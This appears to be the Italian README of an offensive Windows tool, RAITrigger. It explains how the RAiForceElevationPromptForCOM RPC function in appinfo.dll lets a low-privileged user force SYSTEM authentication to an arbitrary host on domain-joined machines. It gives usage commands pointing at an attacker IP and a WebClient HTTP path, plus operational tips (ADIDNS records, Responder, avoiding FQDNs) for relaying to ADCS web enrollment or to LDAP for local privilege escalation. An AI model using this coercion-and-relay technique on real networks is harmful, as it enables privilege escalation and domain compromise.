
Trigger di autenticazione SYSTEM locale per il relaying
La funzione RPC RAiForceElevationPromptForCOM della libreria appinfo.dll consente la coercizione di SYSTEM. Questa funziona solo su sistemi aggiunti a un dominio. Si scopre che questa funzione può essere chiamata da qualsiasi utente con privilegi limitati (non per avviare un processo) ma per attivare l'autenticazione SYSTEM verso una posizione arbitraria. Questo perché CreateFileW viene chiamato come SYSTEM sulla posizione del primo parametro di input:
Poiché l'utente con privilegi limitati viene comunque impersonato, questo non può essere usato come trigger Potato per elevare i privilegi da SEImpersonate a SYSTEM:
Ma può essere usato per richiedere un certificato per l'account computer a ADCS quando l'arruolamento Web è abilitato con l'autenticazione SMB in ingresso. Oppure può essere usato per LPE con relay verso LDAP, quando la firma LDAP non è abilitata.
Per attivare l'autenticazione SMB:
[*] RAITrigger.exe \\attackerip\test\test.exe
Per attivare l'autenticazione HTTP (il servizio WebClient deve essere abilitato):
[*] RAITrigger.exe \\hostname@80\test\test.exe
L'autenticazione HTTP viene attivata solo verso i sistemi della zona Intranet attendibile, quindi dovrai creare un record ADIDNS per il tuo IP Kali oppure essere nella stessa sottorete e usare, ad esempio, Responder. Non usare mai il nome FQDN completo, solo il nome host.
Chiamare questa funzione da remoto (anche con amministratore locale) porta a rpc_access_denied, quindi non è un'alternativa a, ad esempio, PetitPotam o strumenti simili: